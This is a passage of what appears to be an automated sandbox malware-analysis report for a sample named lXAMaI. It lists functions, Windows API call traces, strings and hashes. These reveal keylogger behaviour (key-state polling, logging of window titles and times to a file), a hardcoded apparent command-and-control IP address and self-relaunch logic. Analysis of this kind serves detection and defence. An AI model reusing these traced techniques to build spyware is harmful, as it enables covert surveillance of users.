Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: ExceptionH_prologRaise
String ID: C:\ProgramData\Microsoft\eHome$ios::badbit set$ios::eofbit set$ios::failbit set
API String ID: 3968804221-2287181146
Opcode ID: d5cfa492451586175796f607ccc80483c60eb533fbcce71cc605ef97ab7cfc46
Instruction ID: 1da3206094c95f72b2a0a2bc8f3da74f1eb81f55aab77fef6771ffaba79dbe97
Opcode Fuzzy Hash: d5cfa492451586175796f607ccc80483c60eb533fbcce71cc605ef97ab7cfc46
Instruction Fuzzy Hash: 641108B68011C9BFD700DBA4E891BEE77ACEF08254F54805AF802AF543DA38DE85C760

Function 035A6933 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,E8BDC8C7,?,?,00000000,035B28C2,000000FF,?,035A68CD,035A69E4,?,035A68A1,00000000), ref: 035A6968
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 035A697A
FreeLibrary.KERNEL32(00000000,?,?,00000000,035B28C2,000000FF,?,035A68CD,035A69E4,?,035A68A1,00000000), ref: 035A699C

Strings

CorExitProcess, xrefs: 035A6972
mscoree.dll, xrefs: 035A6961

Memory Dump Source

Source File: 00000007.00000002.3509857649.00000000035A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_35a0000_lXAMaI.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 2b668653339a2862adf87e78dac7ebebf387871d4d6323851819f71075ce08fb
Instruction ID: 824e3254a7bd12166ae076d81363abf443ecbfc0fd434b9c4c87430217e4b304
Opcode Fuzzy Hash: 2b668653339a2862adf87e78dac7ebebf387871d4d6323851819f71075ce08fb
Instruction Fuzzy Hash: 9E016236A44619EFDB11DF54EC09FAEFBB8FB08B10F044625F821B26B4EB749905DA50

Function 03606933 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,E8B1CA06,?,?,00000000,036128C2,000000FF,?,036068CD,036069E4,?,036068A1,00000000), ref: 03606968
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0360697A
FreeLibrary.KERNEL32(00000000,?,?,00000000,036128C2,000000FF,?,036068CD,036069E4,?,036068A1,00000000), ref: 0360699C

Strings

mscoree.dll, xrefs: 03606961
CorExitProcess, xrefs: 03606972

Memory Dump Source

Source File: 00000007.00000002.3509918905.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3600000_lXAMaI.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 0db34ca67a4b89ae2104f5855ccb1baed686516355d77e258720f188c2d60220
Instruction ID: 905d32811df571ed63c403f01b00bd046167e8e590a3c1c20643f0dcb33e33ac
Opcode Fuzzy Hash: 0db34ca67a4b89ae2104f5855ccb1baed686516355d77e258720f188c2d60220
Instruction Fuzzy Hash: BB01A735A00619EFDB11DF54DC05BAFFBB8FB08B15F184626E862A2784D7749910CA50

Function 10010072 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 1000FF91: EnterCriticalSection.KERNEL32(?), ref: 1000FFA1
Part of subcall function 1000FF91: LeaveCriticalSection.KERNEL32(?,?,?), ref: 1000FFC1

LoadLibraryA.KERNEL32(ws2_32.dll,00000005,00000005), ref: 100100A4
GetProcAddress.KERNEL32(?,closesocket), ref: 100100B6
FreeLibrary.KERNEL32(00000000), ref: 100100D7

Strings

closesocket, xrefs: 100100AD
ws2_32.dll, xrefs: 1001009F

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeLeaveLoadProc
String ID: closesocket$ws2_32.dll
API String ID: 2819327233-181964208
Opcode ID: 30b06fb705395a9e176faca9da3635c20405b17682946b5426c9a80c69835ad1
Instruction ID: f0f63e958c4e03f908952b2da035059f2dd426516f35f0bbdae39d88a67d31df
Opcode Fuzzy Hash: 30b06fb705395a9e176faca9da3635c20405b17682946b5426c9a80c69835ad1
Instruction Fuzzy Hash: 1A012CB5D00209EBDB00EFE4CD49AEEB7B4FF08301F104559FA05A7281D7719A44CBA1

Function 1000C4A8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ntdll.dll,?), ref: 1000C4C1
GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 1000C4D9
FreeLibrary.KERNEL32(00000000), ref: 1000C512

Strings

ntdll.dll, xrefs: 1000C4BC
RtlGetNtVersionNumbers, xrefs: 1000C4D0

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: RtlGetNtVersionNumbers$ntdll.dll
API String ID: 145871493-1263206204
Opcode ID: 95243790d39b9988750ae2e221601933c713b570cfe432b70d12ed29a62eaf3f
Instruction ID: a0b29cc0c9603805f8088c7c87bbe868e87cf849093e2480db290d6e8cd3fc5b
Opcode Fuzzy Hash: 95243790d39b9988750ae2e221601933c713b570cfe432b70d12ed29a62eaf3f
Instruction Fuzzy Hash: 9F01C8B4901208EBDB00DFA4C888BDDBBB4FF48305F208598F91597254D775AA85CF50

Function 1000CAF5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35keyboardsleepstringCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(0000000A), ref: 1000CA70
lstrlenA.KERNEL32(00000000), ref: 1000CA7D
GetKeyState.USER32(00000010), ref: 1000CB13
GetAsyncKeyState.USER32(?), ref: 1000CB3C
GetKeyState.USER32(00000014), ref: 1000CB55

Strings

e, xrefs: 1000CB04
], xrefs: 1000CB74

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: State$AsyncSleeplstrlen
String ID: ]$e
API String ID: 43598291-1460998272
Opcode ID: 2cc3bcd530475802a164dc4b89d5be702f3a2f744fc47d0cb29af9faec3dbb25
Instruction ID: 100cfa3ce0e91c9800cf2e787dccec829213a859166f4515be192442b0371d3d
Opcode Fuzzy Hash: 2cc3bcd530475802a164dc4b89d5be702f3a2f744fc47d0cb29af9faec3dbb25
Instruction Fuzzy Hash: D90140B490172C8AEB24DB14CC55B9977B4FB44345F1081BADB19A2245C3B44AC2DE55

Function 10004BCC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35sleepmemoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,00000405,?,?,10002BF7,?), ref: 10004BD7
LocalSize.KERNEL32(00000000), ref: 10004C0B
Sleep.KERNEL32(00000001,00000000,00000000,?,10002BF7), ref: 10004C20
LocalFree.KERNEL32(00000000,?,10002BF7), ref: 10004C2A

Strings

47.76.31.57, xrefs: 10004BF3

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: Local$AllocFreeSizeSleep
String ID: 47.76.31.57
API String ID: 1864957939-3430725257
Opcode ID: a1ecaf08f59f605b0a721a085e5cf880fb8b52246d3729786c64b49585e6cd8c
Instruction ID: 54a24b7a8bb1c63547a173a7f711577d62ee10f310141cd58ce042d3730db2a4
Opcode Fuzzy Hash: a1ecaf08f59f605b0a721a085e5cf880fb8b52246d3729786c64b49585e6cd8c
Instruction Fuzzy Hash: 09F062B8A00208FFE704DBA4CD49E9D7774EB44350F214194F60967291DB719E419B64

Function 10003E3E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35keyboardsleepstringCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(0000000A), ref: 10003DB9
lstrlenA.KERNEL32(00000000), ref: 10003DC6
GetKeyState.USER32(00000010), ref: 10003E5C
GetAsyncKeyState.USER32(?), ref: 10003E85
GetKeyState.USER32(00000014), ref: 10003E9E

Strings

], xrefs: 10003EBD
e, xrefs: 10003E4D

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: State$AsyncSleeplstrlen
String ID: ]$e
API String ID: 43598291-1460998272
Opcode ID: 2cc3bcd530475802a164dc4b89d5be702f3a2f744fc47d0cb29af9faec3dbb25
Instruction ID: 3e8d2ad95dcc67bd0d30d8f0782c44dbbbeb723686232c06a88c7a1a508f6a8b
Opcode Fuzzy Hash: 2cc3bcd530475802a164dc4b89d5be702f3a2f744fc47d0cb29af9faec3dbb25
Instruction Fuzzy Hash: 630140B49016698BEB20CB14CD543AAB7B8FB84345F10C6EADB09A2186C7B48AC18E55

Function 1000BFAC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process,?,1000C638), ref: 1000BFBC
GetProcAddress.KERNEL32(00000000), ref: 1000BFC3
GetCurrentProcess.KERNEL32(00000000), ref: 1000BFDD

Strings

kernel32.dll, xrefs: 1000BFB7
IsWow64Process, xrefs: 1000BFB2

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: AddressCurrentHandleModuleProcProcess
String ID: IsWow64Process$kernel32.dll
API String ID: 4190356694-3024904723
Opcode ID: b7267262a68e6e2bd266d824c08ccdf4cfbd6d75da8a974d621a555449685b69
Instruction ID: 51cb01125cdff6407204784b708377d65fbe72efc42d6d28fd62a24aba955d78
Opcode Fuzzy Hash: b7267262a68e6e2bd266d824c08ccdf4cfbd6d75da8a974d621a555449685b69
Instruction Fuzzy Hash: E7E0C970901219EBEB10DFE4CC4CBADBBB8FB04345F2040A9F909E3250D77456598B51

Function 10002210 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 21libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 10002227
GetProcAddress.KERNEL32(00000000), ref: 1000222E
GetCurrentProcess.KERNEL32(00000000), ref: 10002241

Strings

IsWow64Process, xrefs: 1000221D
kernel32, xrefs: 10002222

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: AddressCurrentHandleModuleProcProcess
String ID: IsWow64Process$kernel32
API String ID: 4190356694-3789238822
Opcode ID: 7f1a65e3de7c5f6ec833cfc47aa44a0bd4f645959f3ebe115b7e43b384a297e1
Instruction ID: 32f47baabb4d25b0a5c8161237b936436095e36a8d6828c608f801c0ef9a2c75
Opcode Fuzzy Hash: 7f1a65e3de7c5f6ec833cfc47aa44a0bd4f645959f3ebe115b7e43b384a297e1
Instruction Fuzzy Hash: 43E09A75C41218FBEB00EBE4DD4DB9DBBB8FB08306F604595F909A3250D7746A498B61

Function 10008D29 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 21libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 10008D40
GetProcAddress.KERNEL32(00000000), ref: 10008D47
GetCurrentProcess.KERNEL32(00000000), ref: 10008D5A

Strings

kernel32, xrefs: 10008D3B
IsWow64Process, xrefs: 10008D36

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: AddressCurrentHandleModuleProcProcess
String ID: IsWow64Process$kernel32
API String ID: 4190356694-3789238822
Opcode ID: cd4ad041a19a1e98351de4bb96d4ab2aa161b0e651269ea02b86a73d2738a174
Instruction ID: f422fd8b9599f309a3c8601596b32b35ab6fdb8f1de9518cc19198cf1218ca25
Opcode Fuzzy Hash: cd4ad041a19a1e98351de4bb96d4ab2aa161b0e651269ea02b86a73d2738a174
Instruction Fuzzy Hash: 52E0EE74801218EBDB00EFE0CC4DBCCBBB8FB08306F2005A9F909A3250D7345A898B65

Function 100031D8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 100031E6
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 10003200
TerminateProcess.KERNEL32(00000000,00000000), ref: 1000320E
ExitProcess.KERNEL32 ref: 10003216

Strings

open, xrefs: 100031F9

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: Process$ExecuteExitFileModuleNameShellTerminate
String ID: open
API String ID: 3240941769-2758837156
Opcode ID: e01c0cd6dc950c17b1960e816c2403e1b24f594ffac668643705b2e67d2d50cc
Instruction ID: 4ebf9b7dc1fb71b2ac605c7f67ebf215e856f5374242fe419578a6cba3e6f8e3
Opcode Fuzzy Hash: e01c0cd6dc950c17b1960e816c2403e1b24f594ffac668643705b2e67d2d50cc
Instruction Fuzzy Hash: 50E02671695224EBF755DB90CC8AFE53624BB48B02F644544F319991D0DBF029858B61

Function 1000E2C0 Relevance: 7.7, APIs: 6, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27b692239e319d683a6359b1bf79d4739a2d09988616b5c568c25c187498cea3
Instruction ID: 0adddc4328f9968a92d6ddc4008425d1085e9ce1679723c8e8e11a1211deba21
Opcode Fuzzy Hash: 27b692239e319d683a6359b1bf79d4739a2d09988616b5c568c25c187498cea3
Instruction Fuzzy Hash: 896129B4A00219EFEB04CF94C984BAEB7B5FF48344F208558EA05BB385D775AE41DB91

Function 10018902 Relevance: 7.6, APIs: 5, Instructions: 150COMMON

Download Yara Rule

APIs

GetStartupInfoA.KERNEL32(?), ref: 10018960
GetFileType.KERNEL32(00000480), ref: 10018A0B
GetStdHandle.KERNEL32(-000000F6), ref: 10018A6E
GetFileType.KERNEL32(00000000), ref: 10018A7C
SetHandleCount.KERNEL32 ref: 10018AB3

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: FileHandleType$CountInfoStartup
String ID:
API String ID: 1710529072-0
Opcode ID: b3c6b729db6907aba57ee9d395b7cb9ceda532107eb232c4a26f3fb60a5c1f9e
Instruction ID: 270872be3da0c5afb5dabe901ecb45eafb6cba6212a520a10738114a3304efd3
Opcode Fuzzy Hash: b3c6b729db6907aba57ee9d395b7cb9ceda532107eb232c4a26f3fb60a5c1f9e
Instruction Fuzzy Hash: CA51F5319043528BE710CB28CC846297BE0FF06368F6A4669D5A69F2E2D734DBC6C742

Function 035A14E7 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

dllmain_raw.LIBCMT ref: 035A1524
dllmain_crt_dispatch.LIBCMT ref: 035A153B
dllmain_raw.LIBCMT ref: 035A1583
dllmain_crt_dispatch.LIBCMT ref: 035A1596
dllmain_raw.LIBCMT ref: 035A15A9

Memory Dump Source

Source File: 00000007.00000002.3509857649.00000000035A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_35a0000_lXAMaI.jbxd

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: 8c1b467e720be01c7dc2cf9d29b5c4edfa1fa05e474f488d4b068f94a4a8275b
Instruction ID: 51cdac81b8b32f52d282c0b4ff1af1e80db5785148c601f83387c35f030f8125
Opcode Fuzzy Hash: 8c1b467e720be01c7dc2cf9d29b5c4edfa1fa05e474f488d4b068f94a4a8275b
Instruction Fuzzy Hash: 83216D75D00E69ABCB21DA5DE8409AE7A7DFB88AA0F094515F8165B370D7308F41AFA0

Function 036014E7 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

dllmain_raw.LIBCMT ref: 03601524
dllmain_crt_dispatch.LIBCMT ref: 0360153B
dllmain_raw.LIBCMT ref: 03601583
dllmain_crt_dispatch.LIBCMT ref: 03601596
dllmain_raw.LIBCMT ref: 036015A9

Memory Dump Source

Source File: 00000007.00000002.3509918905.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3600000_lXAMaI.jbxd

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: e5dbee39727c28cf2c29a14d09cb00f64828a3b0cdb7e7e5b532cf735a8eb42a
Instruction ID: e33200ab654dde259334a679eae8a473babf42db433786c6ae097a64ccd5b3d3
Opcode Fuzzy Hash: e5dbee39727c28cf2c29a14d09cb00f64828a3b0cdb7e7e5b532cf735a8eb42a
Instruction Fuzzy Hash: 032180FDD00228ABCB3ADFD5C94296F7A6DEB827A4F094119F8165F390D7308D418BA4

Function 1000C87E Relevance: 7.6, APIs: 5, Instructions: 82stringtimeCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 1000C89C
GetWindowTextA.USER32(00000000,10053D90,00000400), ref: 1000C8B7
lstrlenA.KERNEL32(10053D90), ref: 1000C8FF
GetLocalTime.KERNEL32(?), ref: 1000C914
wsprintfA.USER32 ref: 1000C977

Part of subcall function 10003AD6: SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001C,00000000), ref: 10003AEC
Part of subcall function 10003AD6: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 10003B53
Part of subcall function 10003AD6: GetFileSize.KERNEL32(?,00000000), ref: 10003B6F
Part of subcall function 10003AD6: SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 10003B8E
Part of subcall function 10003AD6: lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 10003B9E
Part of subcall function 10003AD6: WriteFile.KERNEL32(?,00000000,00000000), ref: 10003BB0
Part of subcall function 10003AD6: CloseHandle.KERNEL32(?), ref: 10003BBD

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: File$Windowlstrlen$CloseCreateFolderForegroundHandleLocalPathPointerSizeSpecialTextTimeWritewsprintf
String ID:
API String ID: 3540613261-0
Opcode ID: f2e0467f3d16f1f9827a9e4136a59ee7d0de2e59ef670b661fdbc4d23d632a7e
Instruction ID: 745145b0fc85912e7ef4d16aa4e0e64ca2fd6a999bfe93b6284bab993792b7a6
Opcode Fuzzy Hash: f2e0467f3d16f1f9827a9e4136a59ee7d0de2e59ef670b661fdbc4d23d632a7e
Instruction Fuzzy Hash: 1E31A8F6A00215A7EB24CB54EC46FE97778EF44304F1441F4F70CB6285EB34AA998A6D

Function 10003BC7 Relevance: 7.6, APIs: 5, Instructions: 82stringtimeCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?), ref: 10003BE5
GetWindowTextA.USER32(00000000,10053D90,00000400), ref: 10003C00
lstrlenA.KERNEL32(10053D90,?,?,?,?,?), ref: 10003C48
GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 10003C5D
wsprintfA.USER32 ref: 10003CC0

Part of subcall function 10003AD6: SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001C,00000000), ref: 10003AEC
Part of subcall function 10003AD6: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 10003B53
Part of subcall function 10003AD6: GetFileSize.KERNEL32(?,00000000), ref: 10003B6F
Part of subcall function 10003AD6: SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 10003B8E
Part of subcall function 10003AD6: lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 10003B9E
Part of subcall function 10003AD6: WriteFile.KERNEL32(?,00000000,00000000), ref: 10003BB0
Part of subcall function 10003AD6: CloseHandle.KERNEL32(?), ref: 10003BBD

Memory Dump Source

